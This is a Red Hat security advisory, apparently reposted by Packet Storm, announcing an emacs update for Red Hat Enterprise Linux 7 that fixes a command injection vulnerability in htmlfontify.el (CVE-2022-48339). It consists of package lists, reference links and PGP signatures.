mKL2artE8gWHQEdiWTGyhdPIXvzhOtC++VQ8m4lZTQHJ9JwEJO4iRntuOpH9CKsZ  
EOnWv6R7NRtI5cJrmnGi/5RGq4zwHTkinVrGZ7LUlxTMSgQCIbC9wFLZjNUJsgEw  
NbI7hFBKbFIoQnGruy2DyKHOVQADz094IkiGdG6p0lL2a31PKSkkSrSsYJdK9heh  
JtPA3mGEuPd+h9i4OcfbRI/jdStJU+UiQSICfO8gS3D4Bf9J8o5jz5rAN41quAqD  
n/BDsgD9Uqw7TfuSOz2b0+oK4nemIZFMUHMAMiyIqqmQ0pZ9NjdvRHXR2m3oW1fN  
VaX8pojSp4KnorwSVhthCgggJigH5ybUIMxGC+IKoOeUfdLD+q27JSFO6LmHBism  
9Inm1Pq7/0K/ziwbmNp5Am9OdK+AKOFuxw3vV9Ib67DK6ORmYQ/0x0QfiXAuYnAK  
OmHTGAMzJH4=  
=3H1J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3517-01

Red Hat Security Advisory 2023-3481-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: emacs security update  
Advisory ID:       RHSA-2023:3481-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3481  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-48339   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in htmlfontify.el (CVE-2022-48339)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2171989 - CVE-2022-48339 emacs: command injection vulnerability in htmlfontify.el

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

ppc64:  
emacs-24.3-23.el7_9.1.ppc64.rpm  
emacs-common-24.3-23.el7_9.1.ppc64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.ppc64.rpm  
emacs-nox-24.3-23.el7_9.1.ppc64.rpm

ppc64le:  
emacs-24.3-23.el7_9.1.ppc64le.rpm  
emacs-common-24.3-23.el7_9.1.ppc64le.rpm  
emacs-debuginfo-24.3-23.el7_9.1.ppc64le.rpm  
emacs-nox-24.3-23.el7_9.1.ppc64le.rpm

s390x:  
emacs-24.3-23.el7_9.1.s390x.rpm  
emacs-common-24.3-23.el7_9.1.s390x.rpm  
emacs-debuginfo-24.3-23.el7_9.1.s390x.rpm  
emacs-nox-24.3-23.el7_9.1.s390x.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-48339  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH9z5tzjgjWX9erEAQh4dRAAiKIWNjgNVzpQdHCrf8gFe0/zeh8iwKOK  
jRufnUymiOn1cv0Zk8Yf0F6QFAg6OFsnhI67zjb0wjXTCbtEELEk+PXj7LWOMxda  
o3z2hlaz/pNqI6XANgMN6GkxUuORfqdwV4zgP3qq0s9hdptzIQEFCvXU+c9antfs  
mDqWQdqZULXKRqmqZsV+FY/GoCOiXR30w4MSGd12qFCcB06MvnYcamvKwhWlXBGl  
s45DdVMuv0W7IRxlj2mwd+1wDI5oSPSuH7Dj3yHsD3B51Is5Ip5fR01fXUg3K/CL  
QKv7tXA5SvvEeZj1aLJld+Ja0X7ArOYcAqVUJNyRx8c3IMUe1eXRpjU38Q1G+5oa  
afIWx+YtydYN/CzrgXvfxwE1pT3MLiRZVYeCY9+3qYdRN6bUwEbMDubpXyB74iCn  
EJeO26l3KuS4Kz8bHxdUOXEaX+NhROeaYE8VpYiUGg86JpU4WLDTkZjth+hxRTxN  
uUNYwQs+FH9YD5OgoQRNSxJSImDhxcfPdbEJQKCH8ojXjGC7rJoJZSMpMzXiPMTc  
tA+n+eKkSs+cIzYl4IARX+MzhjWaMWw+VKEsSO3SeAfkNeWvN2hrHVwzYXO0BSHc  
Mjmzzo/GV8gofa4SDZp+LrdJ3BUnCuwGRaKjDTIGdjuDHBIkDNoMimBTjQ3R/Ti1  
ZHjYLAN9USg=  
=oqzK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm